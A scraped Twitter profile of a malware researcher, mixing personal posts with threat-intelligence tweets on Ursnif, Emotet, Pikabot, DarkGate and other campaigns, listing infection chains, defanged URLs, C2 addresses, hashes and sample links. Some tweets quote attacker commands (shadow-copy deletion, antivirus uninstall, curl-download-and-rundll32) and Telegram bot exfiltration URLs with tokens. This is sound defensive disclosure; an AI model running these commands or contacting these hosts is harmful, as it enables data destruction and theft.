JAMESWT @JAMESWT_MHT Twitter profile

Pinned Tweet

JAMESWT

@JAMESWT_MHT

3 days

#Acquarium update 06/24 😎

3

0

13

Last Seen Profiles

@rngbgtm

@stwmaniax

@rosy_lynhair

@imamastermindTS

@Frdccs176662

@stwgemoy

@ds_Ernst

@Jdowell5

@LukeSchoonmaker

@devildoge9

@Tekcro

@fancydragons66

@wycliffeusa

@stwmaniax

@FollowUrLeader

@PhilippvonAugs

@Merkaba347

@playfreedom12

@HollywoodShack

@LangfordLawson

@HomieTalkPC

@WALUBONJI

@Francis14394571

@OldParks_

@bloodh00f_baine

@Duece_KD

@EzraWilson52020

@SheehanCasey

@ssbmJ666

@stwmaniax

@chvzia

@michaeltastad

@UniUjinent

@CindyCharlotte9

@AntoniaJuhasz

@KasihLudah

JAMESWT

@JAMESWT_MHT

7 months

⚠️This is #crazy ⚠️ We met the #Ursnif #Gang via chat after client infection 🔥

JAMESWT

@JAMESWT_MHT

7 months

@Agenzia_Entrate spam email 24/11/2024 EML>LNK>JS>url>script>EXE>url>fakePNG> > #remcosrat ❇️Samples ⚠️Urls 🌀AnyRun js 🌀AnyRun exe 1/2

3

4

16

9

54

249

JAMESWT

@JAMESWT_MHT

3 years

MY wife told me: This is a kitchen, not your xxx😤 malware office 😂😅🤣

11

16

224

JAMESWT

@JAMESWT_MHT

3 years

Some #CVE -2021-40444 Samples uploaded to #Bazaar @abuse_ch 🔽 ⬆️

5

68

136

JAMESWT

@JAMESWT_MHT

3 years

1 way to ruin a sysadmin's day 🤒🤕😭 Yes water hit @JAMESWT_MHT Fortunatly i lost only 1 backup ups Only old servers out of work from 2017 ended up under water The raised platform saved me and all VMware servers stayed online 💯👍

23

15

138

JAMESWT

@JAMESWT_MHT

4 years

Who is the crazy man that upload sample from VTI to AnyRun with apikey in clear? By the way .. thanks for the gift @malwrhunterteam @_operations6_ @Seifreed @anyrun_app @virustotal

14

21

129

JAMESWT

@JAMESWT_MHT

7 years

My new #VMware #ESX Server #infrastructure 48 logical core 96 with HT 384 GB RAM 6 Terabyte storage 10 gigabit fibre channel Thanks @HP

18

25

123

JAMESWT

@JAMESWT_MHT

7 years

on a very cold day, the wife calls her husband "the car does not start and on the dash appears the image of a man who is shitting" He: "send me a picture" She: "here's the picture ... " @malwrhunterteam @_operations6_

2

38

116

JAMESWT

@JAMESWT_MHT

2 years

#Fake "Windows11 Installation Assistant" 👇 Run👇 > vssadmin delete shadows /all /quiet > wmic product where name="ESET Security" call uninstall /nointeractive > etc windows-11info13.[com/srv/info.php 🔆H/T @malwrhunterteam

4

54

112

JAMESWT

@JAMESWT_MHT

4 years

WTF 30600 tweets... 30600 malware samples? 😳🤔😵 About 2.000.000 processed all hand made from 2018. Since 2014 better not to tell you you could call the asylum 😂😂 I am a crazy dude 😜 @malwrhunterteam

12

9

109

JAMESWT

@JAMESWT_MHT

1 year

Best Malware Hosting Providers

7

34

108

JAMESWT

@JAMESWT_MHT

7 years

ALLRIGHTY! TIME TO DO SOME EVIL STUFF!!!!!!! @malwrhunterteam @BleepinComputer @demonslay335

5

52

99

JAMESWT

@JAMESWT_MHT

9 months

#DarkGate too #italy reply to stolen email conversartion EML>Url>zip>lnk>url>vbs>url>bat>urls>autoit config Samples Urls Run Vbs Bat Graphs

2

32

95

JAMESWT

@JAMESWT_MHT

3 years

🎉🎉🎉Happy Birthday🎉🎉🎉 😅😅😅 @Jameswt_mht 😅😅😅 🎂🎂🎂🥂🥂🥂🎂🎂🎂 #cake #italy #handmade

16

2

91

JAMESWT

@JAMESWT_MHT

3 years

🎉🎉🎉🎉 WOW 🎉🎉🎉🎉 🍺 💐💐💐💐WAHOO💐💐💐💐 🍹 🎊🎊🎊 30K Followers 🎊🎊🎊 🍾 💖💖💖THANK YOU 💖💖💖

12

4

88

JAMESWT

@JAMESWT_MHT

1 year

When Anti #rat sentinel protection seems to work but instead 🤣😅😂

3

15

87

JAMESWT

@JAMESWT_MHT

11 months

IcedID & Qakbot's VNC Backdoors: Dark Cat, Anubis & Keyhole

IcedID & Qakbot’s VNC Backdoors: Dark Cat, Anubis & Keyhole

In this post we introduce Dark Cat, Anubis and Keyhole, three IcedID & Qakbot VNC backdoor variants NVISO observed. We'll follow by exposing TTPs and information leaked through the attackers'...

blog.nviso.eu

1

33

90

JAMESWT

@JAMESWT_MHT

4 years

My little high-tech bag 😂😳😳😁🤣😜

9

3

83

JAMESWT

@JAMESWT_MHT

4 years

😱 O fuck I'm 40 years old today 😱

37

2

84

JAMESWT

@JAMESWT_MHT

5 years

#Operation #ShadowHammer #backdoored version of #ASUS #Live #Update Here the #APT reports Sample @malwrhunterteam @anyrun_app @VirITeXplorer @sS55752750

Analysis AsusLiveUpdate ShadowHammer.zip (MD5: AA15EB28292321B586C27D8401703494) No threats...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

6

51

80

JAMESWT

@JAMESWT_MHT

2 years

Very Interesting ⚠️ #italy ⚠️ Email>Pdf>Html>Iso>lnk>Dll Mentioned "Maybe #EnvyScout sample from #APT29 #NOBELIUM " Samples+EXTRA 👇🔽🔽👇 ⚠️hXXps://www.agencijazaregistraciju.rs/i.html ⚠️hXXps://www.agencijazaregistraciju.rs/t.php cc @csirt_it @AgidGov

RedDrip Team

@RedDrip7

2 years

Maybe #EnvyScout sample from #APT29 #NOBELIUM i.html 3aa44a7951ad95d02c426e9e2a174c2e Decret.iso 6228d15e3bb50adfa59c1bdf5f6ce9f0 Decret.lnk 59b5d262532dab929bbe56c90a0257d2 cmd: %windir%/system32/cmd.exe /c start HP2.exe HPScanApi.dll 6812031432039a89fa741e9338f8e887

1

13

38

1

32

79

JAMESWT

@JAMESWT_MHT

6 years

Hey ... 10.000 Follower ... WOW Thanks to all ... really @malwrhunterteam

9

5

75

JAMESWT

@JAMESWT_MHT

3 years

My best photo shoot 😎 #landscape

3

13

73

JAMESWT

@JAMESWT_MHT

5 years

I am 1 year older today :) :P

23

2

74

JAMESWT

@JAMESWT_MHT

4 years

Do you remember this Sophos article? #Ragnar #Locker / #RagnarLocker I never found IoCs >Msi package/micro.VDI Yet i caught it @malwrhunterteam @guelfoweb @Arkbird_SOLG @VK_Intel @James_inthe_box

2

23

70

JAMESWT

@JAMESWT_MHT

3 years

#Data #Exfiltrator A New Tactic for #Ransomware Adversaries Reference Mentioned Samples cc @verovaleros @felixw3000 @sugimu_sec @struppigel

0

29

68

JAMESWT

@JAMESWT_MHT

10 months

🧰 #Hunting 🧰 ⚠️ #ConnectWise #ScreenConnect Malicious IoCs (MD5 hashlist and C2 to blacklist) 🔥 C2 instance-*-relay[.]screenconnect[.]com *🔽 m73xwc gegn9m bj6uhc g15pic cmjrni ymp7rj cqc6tm whpfy0 q07bx4 Some Samples🔽

3

19

66

JAMESWT

@JAMESWT_MHT

3 years

Collections of #Linux #elf #Ransomware #QNAPCrypt #ECh0raix samples 2020/2021

0

24

64

JAMESWT

@JAMESWT_MHT

4 months

This is #pikabot #SMB \\85.195.115.]20\share

DOCGuard - Detect Maldocs in Seconds!

@doc_guard

4 months

🚨 Malicious Excel File Evaded All The AV Solutions 🚨 📌 VT Detection: 1 / 63 📁 Filename: FACILISFL.xlsx 🔐 MD5: 55514c649e5631548ca25f11de0e9eaa 🕵️‍♂️ IOCs: 85.195[.115.20 DOCGuard Report:

0

11

31

1

17

67

JAMESWT

@JAMESWT_MHT

1 year

#BRT spam email #italy spread #Ursnif #Gozi Email>Pdf>url>zip>js>url>dll Samples Url https://piopler[.com/assistenza https://piopler.[com/ C2 provaterta[.com

4

30

61

JAMESWT

@JAMESWT_MHT

1 year

#ursnif #gozi #italy build 250257 Email>pdf>url>zip>js>url>encoded js>url>DLL Samples @reecdeep da decodificare (JS) Url Zip/js vipbeed.]com/SERVICES second stage vipbeed].com/servizi dll https://vipbeed].com/ C2 twinean.]com

2

29

65

JAMESWT

@JAMESWT_MHT

2 years

Before and After... 🤩🤩🤩

6

64

JAMESWT

@JAMESWT_MHT

6 years

#emotet doc #payload urls /www.ushairrestoration.com/GjIQA/ /boyzfromtheshack.co.za/yJAU/ /onboard-process.com/mCdOP/ /patrishop.com/eEw3Jk/ /accralifestyle.com/C7Yufjp/ @James_inthe_box @dvk01uk @EscInSecurity @MakFLwana

Analysis http://www.entertainment-marketers.com/Informationen/ Malicious activity - Interactive...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

3

37

64

JAMESWT

@JAMESWT_MHT

11 months

#intuit Invoice spam email #Italy spread #ursnif #gozi not confirmed EML>Pdf>Url>js>url>js>url>PEDLL> Samples Urls cc @1ZRR4H @felixw3000 @fumik0_ @58_158_177_102

4

23

65

JAMESWT

@JAMESWT_MHT

4 years

New a #Golang -written #RAT Samples - - - > Reference cc @malwrhunterteam @Arkbird_SOLG @sugimu_sec @verovaleros

MalwareBazaar - 371ce879928eb3f35f77bcb8841e90c5e0257638b67989dc3d025823389b3f79

Threat intel on 371ce879928eb3f35f77bcb8841e90c5e0257638b67989dc3d025823389b3f79 (MD5 48f0de466c907cfb202f006bb0ff0d0b)

bazaar.abuse.ch

1

24

62

JAMESWT

@JAMESWT_MHT

1 year

#Emotet Samples Urls

3

22

63

JAMESWT

@JAMESWT_MHT

1 year

#AgenziaEntrate spam email spread #ursnif #gozi build 250257 Email > pdf > url>zip>js>url>dll Samples Urls (geofenced ITA + IP Blacklist) Zip s://centraless].com/dettaglio Dll s://centraless.]com/ 91.215.85.]153 C2 swebbers.]com mainertin].com

4

22

59

JAMESWT

@JAMESWT_MHT

3 years

@ShadowChasing1 Mentioned Samples Doc Html Cab #CobaltStrike Dll #opendir hidusi.]com/e8c76295a5f9acb7/ #C2 dodefoh.[com:443/ml.html joxinu.[com:443/hr.html > @Namecheap

3

28

61

JAMESWT

@JAMESWT_MHT

1 year

"Fattura XXX" spam email #italy spread #stealer #Strela #signed "12980215 Canada Inc." Payloads "Spanish language" Second Stage C2 91.215.85[.209/server.php cc @1ZRR4H

3

28

60

JAMESWT

@JAMESWT_MHT

9 months

1/2 #DarkGate update/fixed tag with C2 IP 😉

1

21

59

JAMESWT

@JAMESWT_MHT

1 year

H/T @pr0xylife Onenote sample > Bat > curl url > Dll geofenced ITA🔽 Url Run

2

21

57

JAMESWT

@JAMESWT_MHT

5 years

#Emotet #Restarted Docs and Payload cc @malwrhunterteam @JayTHL @JRoosen @Cryptolaemus1 @VirITeXplorer @VK_Intel @reecdeep @_operations6_ @dvk01uk

Analysis ilard_298.exe (MD5: D55A1A33FF66C8E4BB06F60B8C689894) Malicious activity - Interactive...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

5

40

59

JAMESWT

@JAMESWT_MHT

10 days

#mustangpanda #apt samples collection updated cc @smica83

JAMESWT

@JAMESWT_MHT

15 days

#mustangpanda #apt Initial sample thanks to @smica83 ❇️ 🔽

0

7

20

0

20

60

JAMESWT

@JAMESWT_MHT

11 months

Il mio incubo avverato.. Per fortuna che c'era la pedana rialzata e che le cose a terra erano da smaltire Notare livello arancione sulla colonna Ultima foto cosa succede se sala l'acqua di più.. Infatti dopo ho spostato i servers esx dell'armadio nero hp ai piani alti 😬

16

4

60

JAMESWT

@JAMESWT_MHT

3 years

Interesting #Stealer Loader Sample Drop payload from Dropped Samples H/T @malwrhunterteam

3

28

59

JAMESWT

@JAMESWT_MHT

3 months

Too in #italy #WikiLoader - #TA544 #quickbooks "Invoice Reminder: Your payment to Allen&Overy LLP " EML>PDF>url>zip>js>js>dll ⚠️zip Url https[:]//infplaute[.]com/international-commercial ❇️Samples

Cryptolaemus

@Cryptolaemus1

3 months

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll wscript 03_07_2024.js wscript affiliated.js C:\Users\Admin\AppData\Local\Temp\npp.8.6.3.portable.x64\notepad.exe (sideload)👇 \npp.8.6.3.portable.x64\plugins\mimeTools.dll IOC's

1

31

74

2

21

59

JAMESWT

@JAMESWT_MHT

9 months

#IcedID or #Darkgate ? in #italy reply to stolen email conversartion EML>url > .xll > curl > ? 🌟 https://pantherradio.]media/toq/?88085611 Xll curl -o c:\users\public\PM7zc0iWd.dat http://95.164.17.]59/ZIbr7/n7i >scab /k besogon728

Cryptolaemus

@Cryptolaemus1

9 months

#IcedID - #TA577 - url > .xll > curl > .dll EXCEL.EXE Sr.xll cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx rundll32 c:\users\public\9y.dat scab /k besogon728 Samples 👇 IOC's

2

48

132

2

17

56

JAMESWT

@JAMESWT_MHT

6 months

"Promemoria: Fattura Elettronica da Consultare" EML>URL>ZIP>.lnk>JS>bitsadmin>AutoIT>script> Urls 63.151.28.34.bc[.googleusercontent.com/812800/test @test .it 0tuiwp.mariomanagement[.biz.id ? Samples Urls Run

2

18

58

JAMESWT

@JAMESWT_MHT

10 months

#booking spam email spread #AgentTesla / #Xworm ?? ☢️Pdf with "auto" password >Url https://booking-com-details].blogspot.com/ >js >Ps1>Url > http://pwhotelnew.blogspot[.com/atom.xml >Vbs 💥C2 allclop.duckdns].org 💼Samples 1/2

5

19

58

JAMESWT

@JAMESWT_MHT

4 years

Honestly after 6 years I'm tired of dealing with certain cretinates and certain people. Today I am so annoyed that I would like to click shutdown. But I'm not a coward I don't like to give it to the bullies. So unfortunately I'm going to stay here, head down, do what I do best.

8

4

58

JAMESWT

@JAMESWT_MHT

11 months

Mentioned Webshell/backdoor logout.php #Citrix Gateway VPN compromised via #CVE -2023-3519 Sample (tk @malwrhunterteam )

Germán Fernández

@1ZRR4H

11 months

Citrix Gateway VPN compromised via CVE-2023-3519 (a critical unauthenticated RCE) shows evidence of exploitation on 7th July, 11 days before the official patch. The attackers exfiltrated the system configuration file to then probably use the Metasploit module called

10

236

616

0

18

55

JAMESWT

@JAMESWT_MHT

1 year

"BRT S.P.A. - Codice cliente 0XXXX (IDXXXX) spam email spread #ursnif #gozi #italy EML>Pdf>url>zip>js>url>dll Samples Domain s:/exeseria[.]com/ C2 s:/avas1ta.[com/in/login/ itwicenice[.com s://avas1t.[de/in/loginq/ cc @58_158_177_102 @felixw3000 @fumik0_

2

23

54

JAMESWT

@JAMESWT_MHT

2 years

#Interesting malware Exe > CertUtil>sysinternal procdump >Link > CertUtil / Curl / github etc Run 🔆 🔆 Samples 👇👇👇 H/T @malwrhunterteam

2

17

53

JAMESWT

@JAMESWT_MHT

2 months

#netsupport #config @c_APT_ure #fin7 #APT 5.8.63.[140[:443 ♻️ ➿Samples

2

25

55

JAMESWT

@JAMESWT_MHT

3 years

Revealed The secret of the quality of pigs bred in Italy 😅😂🤣

4

7

54

JAMESWT

@JAMESWT_MHT

15 days

#fakeanydesk Payload is download from https://monkeybeta[.]com/build/AnyDesk-x86.msix backup copy https[:]//we[.]tl/t-7F4jbBBTw0

Intel-Ops

@Intel_Ops_io

15 days

New impersonation domains for @anydesk and @NotionHQ delivering malicious MSI packages, likely via SEO poisoning: 45.93.20[.]93 - AS 57523 (Chang Way Tech Co. Ltd) amydlesk[.]com (0/93) notlilon[.]co (1/93) notliion[.]com (8/93)

2

16

52

4

16

55

JAMESWT

@JAMESWT_MHT

8 months

EML>LINK>URL>JS>url 1 url 2>Exe eachday.]com/u2z/9oa/m0t3hg0h8uyx www.roboticaeducativa].pe/za/ www.precisiongroupsa.]com/wsjdfghd/ > js > sduyvzep.]top/ *1.php?hash= *2.php?id= temp.]sh/bfseS/ruzxs.exe AnyRun Samples

4

19

52

JAMESWT

@JAMESWT_MHT

5 years

#Emotet First seen: 2019-08-19 @JRoosen @kafeine @VK_Intel @malware_traffic @malwrhunterteam @James_inthe_box @JCyberSec_ @_operations6_ @bry_campbell @certbund

4

18

52

JAMESWT

@JAMESWT_MHT

6 years

#GandCrab #ransomware version 5.0.3 js payload @VirITeXplorer @a_de_pasquale @malwrhunterteam @James_inthe_box @VK_Intel @demonslay335 @BleepinComputer @struppigel @SettiDavide89 @luc4m

Analysis GandCrab 5.0.3 (MD5: 95557A29DE4B70A25CE62A03472BE684) Malicious activity - Interactive...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

6

23

47

JAMESWT

@JAMESWT_MHT

4 years

#opendir everything sorted and classified 🤣😅 #malware #infosec #threathunting #cybersecurity @FewAtoms @malwrhunterteam

1

20

51

JAMESWT

@JAMESWT_MHT

2 years

#fakeapp #fakecrack Malware Collection Updated 👇👇👇 H/T @l205306 @idclickthat @ffforward

0

16

50

JAMESWT

@JAMESWT_MHT

6 months

#booking spam email spread #AgentTesla > #Aggah Eml>pdf>js>urls>ps1>dll Samples Urls Run #xworm C2 cpabuzus.[duckdns[.org api.]telegram.]org/bot6407936943:AAEbwVgCBACnK7GYTzSa5oskTB62S51g10o/sendDocument

1

16

51

JAMESWT

@JAMESWT_MHT

6 months

#Pikabot #Italy from real stolen conversation EML>PDF>LNK>ZIP>JS>URLS>DLL via curl Samples Urls C2 check tweet from @reecdeep

reecDeep

@reecdeep

6 months

🔥 #Pikabot #malware #TA577 targets #Italy 🇮🇹 11-12-23 PDF>LNK>ZIP>JS>DLL 🔥c2 66.42.80.169:5631 154.38.184.5:9785 65.20.82.254:5243 65.20.98.24:13783 154.61.75.156:2078 31.220.96.162:2224 109.123.227.54:13785 109.123.227.50:13782 #infosec #CyberSecurity

1

21

47

0

19

51

JAMESWT

@JAMESWT_MHT

2 years

TeamBot sample caught by @abuse_ch 👇👇👇 drop "only" 😱😱😱 #socelars #stealer #loader #rat #redline #amadey #ransomware etc Run

2

22

50

JAMESWT

@JAMESWT_MHT

3 years

#DarkSide #ransomware #elf #64bit X86 #signed " RHM Ltd" Uploaded Some Samples to Bazaar 😉

1

26

51

JAMESWT

@JAMESWT_MHT

7 months

#booking spam spread #RedLineStealer Malicious Campaign that targering #Hotel EML xuxaemberlin funderbunkantonina briannagolladay @ gmail .com >LNK>URL>EXE ❇️Samples ⚠️Urls ⏬AnyRun 🎯C2 193.233.132].43

5

14

51

JAMESWT

@JAMESWT_MHT

2 years

#Qbot #Quakbot #Qakbot ??? Zip Xlsb Dll Zip Urls geofenced USA / Australia Dll urls /8643842914630250.dat 79.141.167.]194 74.119.194.]108 51.195.38.]36

4

19

50

JAMESWT

@JAMESWT_MHT

2 years

#Lazyscripter APT Collection Samples updated ✳️

Ankit Anubhav

@ankit_anubhav

2 years

I was wondering why #Lazyscripter APT got their name. Maybe because they are using the same malware host since end 2020 which is still up? /hpsj.firewall-gateway.net/hpjs.php Attacks are reaching via maldoc seen during this new year (password 12345A)

5

19

40

1

21

47

JAMESWT

@JAMESWT_MHT

6 years

#GandCrab #Ransomware #urls #sourcelink Little Summary @dvk01uk @malwrhunterteam @VirITeXplorer @Techhelplistcom @_ddoxer @JRoosen @Mesiagh @James_inthe_box @SettiDavide89 @a_de_pasquale @benkow_ @Bank_Security @forensico @gvarisco @CertPa @_operations6_

8

31

50

JAMESWT

@JAMESWT_MHT

7 months

"Booking. com Invoice " Eml>pdf>js>urls>config>dll> #stealer (agenttesla ? snakekeylogger?) ❇️Samples ⚠️Urls ⏬AnyRun ⚠️C2 s://api.[telegram.[org/bot6668004993:AAHeLIV9IZttpue_B8ou1npc8y-k3b-XNWI/sendDocument

2

11

49

JAMESWT

@JAMESWT_MHT

1 year

#ursnif #gozi #agenziaentrate #italy 🪧Zip oknaoptima24.]ru/agenzia/b85d/ZgHQnr.php gapegape.]co.]za/agenzia/5d14/p6oHkk.php 📋SMB \\Agenzia\Informazion.exe 62.173.147.]35 - 36 📡C2 62.173.140].150 31.41.44].179 91.107.119].172 Samples👇

3

20

48

JAMESWT

@JAMESWT_MHT

9 months

"BOOKING" spam email spread #Arkei #Vidar #Stealer ☢️Sample ☣️Urls / C2 🌟Run cc @malwrhunterteam @James_inthe_box @reecdeep @viuleeenz

1

18

50

JAMESWT

@JAMESWT_MHT

1 year

#Pikabot - #TA577 - url > .js > ps > .dll too in #italy from stolen conversation from 2019 Samples Urls

1

24

49

JAMESWT

@JAMESWT_MHT

8 months

#IcedID ( #Bokbot ) > #KeyholeVNC => #CobaltStrike Spam Email Campaign Urls Samples Run C2s: skrechelres[.]com jerryposter[.]com jkbarmossen[.]com evinakortu[.]com hofsaalos[.]com 1/2

1

22

49

JAMESWT

@JAMESWT_MHT

3 years

#Ryuk #Ransomware #signed "BBT KLA d.o.o." Sample H/T @malwrhunterteam cc @sugimu_sec @fr0s7_ @FBussoletti @guelfoweb @lazyactivist192 @felixw3000 @Jan0fficial @ffforward @58_158_177_102 @cocaman @VK_Intel @verovaleros @demonslay335

0

20

49

JAMESWT

@JAMESWT_MHT

11 months

#Italy hit by #AgenziaEntrate spam email spread #Spy #Mekotio ⚡️Samples 🌐Urls 🧰Run ⚠️C2 146.70.24].214

1

23

47

JAMESWT

@JAMESWT_MHT

4 years

I spoke With @malwrhunterteam about android / huawei own OS Etc etc About mobile phone We have come to this decision At least 1 week Battery autonomy without recharge Interchangeable battery 99% privacy 99% malware free No update no upgrade ⬇️⬇️⬇️

9

16

46

JAMESWT

@JAMESWT_MHT

6 years

#FF 1 Phishing @illegalFawn @PhishingAi MalwareFromSpam @dvk01uk @SettiDavide89 @malware_traffic Ransomware @demonslay335 IoC @Mesiagh @_ddoxer @JRoosen OpenDir @JaromirHorejsi @DissectMalware @nullcookies @executemalware not to be missed @malwrhunterteam @James_inthe_box

8

14

49

JAMESWT

@JAMESWT_MHT

1 year

#AgenziaEntrate spam email #Italy EML>pdf>url>zip>js>url>Dll spread #ursnif #gozi Botnet 5050 Build 250259 🧰Samples 🔕Urls ⚰️C2 njamma].com extra avas1ta.]com avas1t].de

2

16

46

JAMESWT

@JAMESWT_MHT

7 months

#booking spam email spread #RedLine Stealer ❇️Last Url pw 2023 ❇️Samples 🔄AnyRun ⚠️C2 212.113.116].63

JAMESWT

@JAMESWT_MHT

7 months

#booking spam email spread #Vidar #Stealer Last Urls pw 2023 and 123456 Samples C2 steamcommunity[.com/profiles/76561199568528949 t.[me/secgoxrp 116.203.166.[75:2087 116.203.6[.243 195.201.251.[173

2

14

44

0

14

47

JAMESWT

@JAMESWT_MHT

10 months

Spam Email spread #FormBook 👑Xls 💥Url http://23.95.122[.94/600/isoHost.exe 🛡️Payload 🏃‍♂️Run

1

13

46

JAMESWT

@JAMESWT_MHT

3 years

#Malware Collections 365 / 24/7 Online No blacklist No password Fast Download Unlimeted space cdn.discordapp[.com 😂🤣😝 🔽

2

7

46

JAMESWT

@JAMESWT_MHT

11 months

#ursnif #gozi #loader from #intuit spam email EML>PDF >URL https:]//dybseta.]com/Special zip>js >URL https:]//dybseta.]com/MySelective 1 time from same IP #italy >js >URL https://cdn.discordapp.]com/attachments/1128612297611415575/1134154620168568862/iiis12211221.iso >DLL 1/2

5

18

47

JAMESWT

@JAMESWT_MHT

2 years

#FF Friday #malware #research and #detection

2

9

46

JAMESWT

@JAMESWT_MHT

1 year

"URGENT: NEW ORDER 01-4291937" spam email spread #AgentTesla Doc >cve-2017-11882>Url 194.180.48[.59/obizx.exe >Exe Url Ip Relation Exfil SMTP maggie.hualingan @gmail ].com

1

19

48

JAMESWT

@JAMESWT_MHT

4 years

#ursnif #dreambot #gozi Samples -> @virusbay_io Payload mrcsecure.[ru/zuewrgfhbasdfrpeugyfhsaj.bin >dossecure[.ru >buddy-calc[.at @VK_Intel @felixw3000 @fumik0_ @58_158_177_102 @sugimu_sec @VirITeXplorer @Arkbird_SOLG @James_inthe_box @reecdeep @luc4m

Analysis Dôvodová správa č.1 (0093-5145).doc (MD5: C6E4365F50E1E1C40C5E8568280D50E3) Malicious...

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

3

24

47

JAMESWT

@JAMESWT_MHT

4 years

#Molerats Delivers #Spark #Backdoor Reference new Samples Source https://vinnysvinyl.]com/Saudi.doc https://vinnysvinyl.]com/Pixlr.msi @malwrhunterteam @Ethereal_x0r @guelfoweb @VK_Intel @James_inthe_box @reecdeep @Arkbird_SOLG

Analysis https://vinnysvinyl.com/Saudi.doc Malicious activity - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

app.any.run

1

25

45

JAMESWT

@JAMESWT_MHT

4 years

#Ransomware 34 #Thanos Genes VT from dttcodexgigas (Deloitte Argentina) ✳️1° Run ✳️2° Run ✅Genes ✅Sample cc @malwrhunterteam @demonslay335 @VK_Intel @sugimu_sec @Arkbird_SOLG

2

17

46

JAMESWT

@JAMESWT_MHT

5 months

#AgentTesla #booking EML>PDF>url>js>url>script>infection ❇️Samples 🔥Urls htlbackfeb-03-24.]com booking-c. booking-coms. htlfeb24. *blogspot[.com ⚠️C2 https://api.telegram.]org/... 🌀AnyRun

1

15

45

JAMESWT

@JAMESWT_MHT

4 years

#Ekans #Snake #Ransomware after #Honda HIT #ENEL #Italy Sample @malwrhunterteam @Ethereal_x0r @guelfoweb @VirITeXplorer @demonslay335 @Certego_IRT @D3LabIT @reecdeep @a_de_pasquale @forensico @Arkbird_SOLG @IntezerLabs @arieitan

5

21

46

JAMESWT

@JAMESWT_MHT

1 year

H/T @pr0xylife bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf Samples (invoice in italian language) Url https://dl.dropboxusercontent.]com/s/861qj7y6d154i94/Edodvle.png?dl=0 #stealer #blackguard

0

13

47

JAMESWT

@JAMESWT_MHT

3 years

Collaboration between FIN7 and the RYUK group, a Truesec Investigation

2

25

47

JAMESWT

@JAMESWT_MHT

3 years

Dear wife, kitchen yet is malware free 😚 "OK dear husband, then you deserve this handmade #cake "😘 OH your are my sweet love. Really 🥰

JAMESWT

@JAMESWT_MHT

3 years

MY wife told me: This is a kitchen, not your xxx😤 malware office 😂😅🤣

11

16

224

1

3

45

JAMESWT

@JAMESWT_MHT

4 months

Hunting some Samples #pikabot

reecDeep

@reecdeep

4 months

⚠️TA577 starts spreading #Pikabot #malware eml>.zip>.html(link) html files with 0 detections on Virustotal and decoy latin words 🔥staging ip: 204.44.125.68 103.124.104.76 103.124.104.22 66.63.188.19 104.129.20.167 #infosecurity #CyberAttack

7

18

86

1

9

46

JAMESWT

@JAMESWT_MHT

11 months

#StrelaStealer too today too in #italy via certutil Js 2401ec9ab6c8a2c5ebcfdd3542411ad6 > Bat > CertUtil TXT B9970D0652E0AE78DE4DEF9C6BCD3F69 > Dll 88FC768F1E1C86650A267C4C54C14607 ♨️🧰Run Samples will be uploaded to bazaar

2

24

47

JAMESWT

@JAMESWT_MHT

3 years

Samples related to #CVE -2021-41379 🔽 (uploading 8 samples thanks too to @malwrhunterteam ) 🔽

Keith KorbenD Wingo

@KorbenD_Intel

3 years

"Talos has already detected malware samples in the wild that are attempting to take advantage of this vulnerability." @James_inthe_box @JAMESWT_MHT @malwrhunterteam @wdormann links to any of these on VT ?

1

4

19

0

16

45

JAMESWT

@JAMESWT_MHT

2 years

#Signed "Revo Security SRL" samples ✳️ #IcedID C2 hipnoguard.]com carpricegoods[.com H/T @malwrhunterteam

4

21

43

JAMESWT

@JAMESWT_MHT

1 year

#ursnif #gozi Botnet 7702 Build250249 spam email campaign @Agenzia_Entrate @MISE_GOV themes Samples Zip/Url/Exe #SMB \ministro\finanz.exe 31.41.44.]153 62.173.138.]164 C2 62.173.138.]160 193.0.178.]141 31.41.44].122 cc @58_158_177_102 @reecdeep @fumik0_

4

14

44

JAMESWT

@JAMESWT_MHT

3 years

"Don't Fall for This Holiday Survey Fraud" spam email spread #Dridex Xlsb/Dll Dll Urls C2 51.68.138.]110:443 206.189.150.]190:8116 103.109.247.]10:10443 23.253.208.]162:9217